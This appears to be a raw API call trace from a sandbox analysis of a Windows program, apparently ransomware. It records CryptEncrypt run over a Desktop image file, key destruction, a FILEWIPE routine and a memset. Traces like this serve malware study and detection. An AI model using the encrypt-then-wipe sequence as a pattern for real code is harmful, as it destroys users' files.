[0031.238] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.238] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.239] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.239] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0031.239] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0031.239] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.239] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8c70d8*, pdwDataLen=0x6ae220*=0x1710f, dwBufLen=0x17110 | out: pbData=0x8c70d8*, pdwDataLen=0x6ae220*=0x17110) returned 1 [0031.239] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.239] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.239] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0031.240] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.240] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.240] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.240] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.240] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0031.240] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0031.240] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0031.240] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.240] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0031.240] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.240] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0031.240] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0031.240] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0031.240] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0031.240] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0031.240] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.240] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0031.240] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.240] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0031.240] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0031.240] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.240] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0031.240] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.240] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0031.240] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0031.240] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.247] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.247] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.247] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0031.247] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.249] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.249] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.249] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0031.249] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.249] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0031.249] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0031.249] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.250] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.250] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0031.250] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0031.250] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.250] CryptDestroyKey (hKey=0x7c2200) returned 1 [0031.250] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0031.250] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0031.250] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0031.250] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0031.250] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0031.250] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0031.250] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0031.250] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.250] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0031.250] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0031.250] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0031.250] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0031.250] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0031.250] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0031.250] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0031.250] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.250] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0031.250] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0031.251] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0031.251] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0031.251] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0031.251] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0031.251] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0031.251] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0031.251] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0031.251] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.251] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0031.251] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0031.251] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0031.251] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.251] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0031.251] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.251] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0031.251] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0031.251] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0031.251] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0031.251] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0031.251] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.251] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0031.251] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.251] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0031.251] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0031.251] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.251] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.251] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.251] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0031.251] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0031.251] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0031.252] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0031.252] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0031.252] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0031.252] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.252] CryptReleaseContext (hProv=0x7d5b30, dwFlags=0x0) returned 1 [0031.252] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.252] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.252] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.252] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0031.252] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0031.252] FreeLibrary (hLibModule=0x754b0000) returned 1 [0031.252] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0031.252] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0031.252] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.252] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0031.252] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.252] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0031.252] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0031.252] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.252] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.252] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.252] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.252] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0031.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0031.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0031.253] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.253] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.253] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\jJp_bFL.jpg", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34de5420, ftCreationTime.dwHighDateTime=0x1d5c30b, ftLastAccessTime.dwLowDateTime=0xa6fb2b30, ftLastAccessTime.dwHighDateTime=0x1d5ba0c, ftLastWriteTime.dwLowDateTime=0xa6fb2b30, ftLastWriteTime.dwHighDateTime=0x1d5ba0c, nFileSizeHigh=0x0, nFileSizeLow=0x1710f, dwReserved0=0x0, dwReserved1=0x777648, cFileName="jJp_bFL.jpg", cAlternateFileName="")) returned 0x7c2100 [0031.253] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0031.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0031.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0031.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0031.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0031.253] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.253] CharLowerBuffW (in: lpsz="byte[94479]", cchLength=0xb | out: lpsz="byte[94479]") returned 0xb [0031.253] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.253] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0031.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0031.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0031.254] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.254] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0031.254] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0031.254] FreeLibrary (hLibModule=0x76b40000) returned 1 [0031.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0031.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0031.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0031.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0031.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0031.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0031.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0031.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0031.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0031.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0031.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0031.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0031.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0031.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0031.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0031.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0031.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0031.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0031.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0031.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0031.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0031.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0031.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0031.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0031.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0031.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0031.255] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0031.255] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0031.255] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0031.255] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.255] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.255] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.255] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0031.255] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.255] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.255] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.255] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.255] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.255] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.255] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.255] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.255] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.255] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 